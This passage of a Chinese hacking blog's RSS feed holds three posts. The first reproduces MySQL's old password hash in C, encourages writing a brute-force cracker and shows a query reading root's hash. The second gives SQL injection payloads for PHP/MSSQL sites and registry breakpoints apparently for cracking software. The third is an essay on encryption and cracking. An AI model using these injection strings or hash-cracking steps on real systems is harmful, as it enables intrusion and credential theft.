sec)<br><br>我想无需用过多言语，大家应该都很清楚mysql4.1.x以后版本的加密方式了吧。<br><br><br>接下来说一说mysql323加密。 <br><br>这个我是直接从mysql源代码里抠出来的。代码如下：<br><br><br>#include &quot;stdio.h&quot;<br>#include &lt;string.h&gt;<br><br>void hash_password(long *result, const char *password, int password_len)<br>{<br>register long nr=1345345333L, add=7, nr2=0x12345671L;<br>long tmp;<br>const char *password_end= password + password_len;<br>for (; password &lt; password_end; password++)<br>{<br>if (*password == &#39; &#39; || *password == &#39;\t&#39;)<br>continue; /* skip space in password */<br>tmp= (long) (char) *password;<br>nr^= (((nr & 63)+add)*tmp)+ (nr &lt;&lt; 8);<br>nr2+=(nr2 &lt;&lt; 8) ^ nr;<br>add+=tmp;<br>}<br>result[0]=nr & (((long) 1L &lt;&lt; 31) -1L); /* Don&#39;t use sign bit (str2int) */;<br>result[1]=nr2 & (((long) 1L &lt;&lt; 31) -1L);<br>}<br><br>int main(int argc, char* argv[])<br>{<br>const char *password=&quot;kyo&quot;;<br>long hash_res[2];<br>hash_password(hash_res, password, (int) strlen(password));<br>printf(&quot;%08lx%08lx\n&quot;, hash_res[0], hash_res[1]);<br>return 0;<br>}<br><br><br>运行后<br>7901b47128d1045d<br>-----------------------------------------------------------------------------------<br>mysql&gt; select old_password(&#39;kyo&#39;);<br>+---------------------+<br>| old_password(&#39;kyo&#39;) |<br>+---------------------+<br>| 7901b47128d1045d |<br>+---------------------+<br>1 row in set (0.00 sec)<br>-----------------------------------------------------------------------------------<br><br><br>over。<br>想做mysql密码爆力破解工具的，根据本文应该很容易写出来了。<br>------------------------------------------------------------------------------------------------------<br><br>mysql&gt; use mysql;<br>Database changed<br>mysql&gt; select password from user where user=&#39;root&#39;;<br><br>///////////////////////////////////////////////////////////////////////////////////////////<br>select password from mysql.user where user=&#39;root&#39;;<br>
		<br><br><link href="http://www.kyospace.com/rssstyles.css" rel="stylesheet" type="text/css">]]></content:encoded>
    <link><![CDATA[http://www.kyospace.com/blogview.asp?logID=342]]></link>
    <dc:subject><![CDATA[KYO--随笔]]></dc:subject>
    <dc:creator><![CDATA[kyo327]]></dc:creator>
    <dc:date>2010-03-09T16:35:09Z</dc:date>
  </item>

	<item rdf:about="http://www.kyospace.com//blogview.asp?logID=341">
    <title><![CDATA[tips 条件断点]]></title>
    <description><![CDATA[在mysql中。
mysql&gt; sel&#101;ct * from z_admin wh&#101;re admin='admi\'';
Empty set (0.00 sec)
mysql&gt; sel&#101;ct * from z_admin wh&#101;re admin='admi\';
 '&gt; ';
Empty set (0.02 sec)

可以看到 这个语句是没法执行的。
sel&#101;ct * from...]]></description>
    <content:encoded><![CDATA[在mysql中。<br>mysql&gt; select * from z_admin where admin=&#39;admi\&#39;&#39;;<br>Empty set (0.00 sec)<br>mysql&gt; select * from z_admin where admin=&#39;admi\&#39;;<br>    &#39;&gt; &#39;;<br>Empty set (0.02 sec)<br><br>可以看到 这个语句是没法执行的。<br>select * from z_admin where admin=&#39;admi\&#39;<br>应该是把\&#39;解释成字符串中的单引号了，那么就缺少闭合的单引号。<br>----------------------不华丽的分割线-------------------------------------<br>而在mssql中。<br>select * from backupfile where filegroup_name=&#39;de\&#39;&#39;<br>会出现这种情况。<br>服务器: 消息 105，级别 15，状态 1，行 1<br>字符串 &#39;de\&#39;<br>&#39; 之前有未闭合的引号。<br>服务器: 消息 170，级别 15，状态 1，行 1<br>第 1 行: &#39;de\&#39;<br>&#39; 附近有语法错误。<br><br>select * from backupfile where filegroup_name=&#39;de\&#39;<br>语句这样的话能顺利执行。<br>这说明 mssql是只鸳鸯啊，只要不是成对出现  就不让你执行，和mysql刚好相反。<br><br>有什么用呢？？？？<br>我说一种，其他的自己琢磨。<br>在php+mssql的环境下 当magic_quotes_gpc==on时，不用管他。<br>开启错误提示的话 fuck.php?a=aaaaa&#39; and @@version=0--  <br>and后面随便跟什么语句慢慢来爆<br><br>没开错误提示的话。直接fuck.php?a=aaaaa&#39; union select 1,2,3--  慢慢猜吧<br><br><br>////////////////////////////////////////////////////<br>下注册表函数的断点。<br>在RegQueryValueExA处下条件断点：[esp+8]==&quot;ProgData&quot;&&[esp+14]!=0<br>在RegOpenKeyExA处下条件断点：[esp+8]==&quot;Software\\EUsoft\\superdic&quot;<br><br>
		<br><br><link href="http://www.kyospace.com/rssstyles.css" rel="stylesheet" type="text/css">]]></content:encoded>
    <link><![CDATA[http://www.kyospace.com/blogview.asp?logID=341]]></link>
    <dc:subject><![CDATA[黑客技术文章]]></dc:subject>
    <dc:creator><![CDATA[kyo327]]></dc:creator>
    <dc:date>2010-03-04T15:15:26Z</dc:date>
  </item>

	<item rdf:about="http://www.kyospace.com//blogview.asp?logID=340">
    <title><![CDATA[唠一唠加密与解密]]></title>
    <description><![CDATA[Author: kyo327
email: humour327#hotmail.com
Date: 2010-03-03

我认为加密与解密就是高级智慧生物一种脑力活动方式，也是区别于其他动物最明显的标志之一。几千年以前凯撒曾经使用一种加密方法用于传递战争中的信息，其实这段历史足以说明加密解密是人类智慧的结...]]></description>
    <content:encoded><![CDATA[Author: kyo327<br>email:   humour327#hotmail.com<br>Date: 2010-03-03<br><br>我认为加密与解密就是高级智慧生物一种脑力活动方式，也是区别于其他动物最明显的标志之一。几千年以前凯撒曾经使用一种加密方法用于传递战争中的信息，其实这段历史足以说明加密解密是人类智慧的结晶。在冷兵器时代打仗不就是两军交战，多者胜吗？但是信息加密的出现打破了这种常规，在测探军机要情后总要经过信息的传递，而那种加了密的信息即便被对方截获也看不出东南西北来，这样在知己又知彼的情况下再熟练的运用三十六计很容易就能以少胜多了。可见信息加密的重要性。<br><br>       计算机的面世凸现了人类喜欢利用加密与解密庸人自扰的现实。很早的时候软件程序根本没有壳的概念，因为没有很多人看的懂那些二进制代码，所以程序作者可以用最简单的直接比较的认证方式来阻挡没有付费的使用者。随着学习计算机的人越来越多，无聊的人就编出了反汇编器，这样二进制代码被转换成了汇编指令，人们理解程序流程就方便多了。眼看程序开发者辛辛苦苦开发的软件被人们轻易的破解，于是壳出现了，越来越多的加密算法也出现了。而破解者也不甘心，有加密就有解密，不然算法的设计者也无法解出答案。而最无辜的用户始终是受害者，他们想要的仅仅是程序的应用，却不得不运行程序之外为了阻挡破解者的壳、VM、成千上万行的垃圾代码，软件的运行速度竟然要卡十几秒钟才能启动。用户也许很疑惑，现在电脑的硬件CPU都是4核的，内存4G还是双通道的，可为什么还不如win98时代在64M内存的机器上的运行速度呢？其实用户每运行一次加了VM的软件，还要连带的安装并运行一个带解释器的虚拟机，那速度能快得起来才真是奇迹呢。也许很多人认为那些设计VM的作者的脑袋应该是被驴踢了，其实我觉得也是。但我们应该知道，这可能也不是他们的意愿，是被那些无聊的破解者给逼出来的。而用户都成了设计开发者与破解者智慧斗争中的牺牲品。<br><br>       其实网络安全的世界也是一样的，如果没有黑客，程序开发者闲的蛋疼才去过滤那些乱七八糟的特殊字符呢，他们巴不得把应用设计好了就利用空余时间偷偷菜呢。而利用WEB赚钱的企业所部署的防火墙、招聘的网络安全工程师、购买的漏洞扫描软件等等所花费的RMB不会是从天上掉下来的，羊毛出在羊身上，吃亏的还是无辜的用户。因此用户又一次成了程序员与黑客智慧斗争的牺牲品。<br><br>   也许在我为所不知的很多领域，用户应该也是所有无聊者与对抗无聊者之间斗争的牺牲品。<br>
		<br><br><link href="http://www.kyospace.com/rssstyles.css" rel="stylesheet" type="text/css">]]></content:encoded>
    <link><![CDATA[http://www.kyospace.com/blogview.asp?logID=340]]></link>
    <dc:subject><![CDATA[KYO--随笔]]></dc:subject>
    <dc:creator><![CDATA[kyo327]]></dc:creator>
    <dc:date>2010-03-03T14:06:13Z</dc:date>
  </item>

      </rdf:Seq>
    </items>
  </channel>
</rdf:RDF>

